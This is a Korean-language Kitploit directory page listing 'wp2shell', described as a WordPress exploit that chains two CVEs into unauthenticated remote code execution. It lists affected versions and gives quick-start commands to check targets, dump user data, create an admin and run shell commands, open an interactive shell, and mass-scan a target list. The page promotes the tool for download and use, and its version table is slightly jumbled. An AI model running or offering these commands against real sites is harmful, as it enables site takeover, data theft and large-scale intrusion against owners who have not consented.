Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
wp2shell — wp2shell - 워드프레스 RCE 및 PoC (CVE-2026-63030 + CVE-2026-60137) | Kitploit
도구/GitHubGitHub/johenlastgen-jlg/wp2shell
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubjohenlastgen-jlg/wp2shell

wp2shell

wp2shell - 워드프레스 RCE 및 PoC (CVE-2026-63030 + CVE-2026-60137)

저장소 보기
21111개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

wp2shell - WordPress RCE PoC (CVE-2026-63030 + CVE-2026-60137)

WordPress Core에서 인증되지 않은 원격 코드 실행

제작: JohenLastGen


📌 개요

이 도구는 두 가지 치명적인 WordPress 취약점을 연계하여 인증되지 않은 RCE를 달성합니다:

취약점CVE설명
REST 배치 라우트 혼동CVE-2026-63030검증 우회, SQLi 페이로드 밀반입
WP_Query author__not_in SQLiCVE-2026-60137원시 문자열 삽입 → SQL 실행

영향: 인증되지 않은 공격자 → 관리자 생성 → 명령 실행


🎯 영향을 받는 버전

버전 범위상태
WordPress 6.9.0 - 6.9.4✅ 취약 (전체 RCE 체인)
WordPress 7.0.0 - 7.0.1✅ 취약 (전체 RCE 체인)

🚀 빠른 시작

root@kitploit:~
#options:
  -h, --help show this help message and exit
python3 wp2shell.py --help

# 1. Check if target is vulnerable
python3 wp2shell.py check https://target.com

# 2. Extract data (fingerprint/users)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users

# 3. RCE - Create admin & execute command (NO CREDENTIALS NEEDED!)
python3 wp2shell.py shell https://target.com --cmd "id"

# 4. Interactive shell
python3 wp2shell.py shell https://target.com --interactive

# 5. Mass scan multiple targets
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json
도구 다운로드
WordPress 6.8.0 - 6.8.5⚠️ SQLi 전용 (보조 플러그인 필요)
WordPress 6.9.5, 7.0.2+❌ 패치됨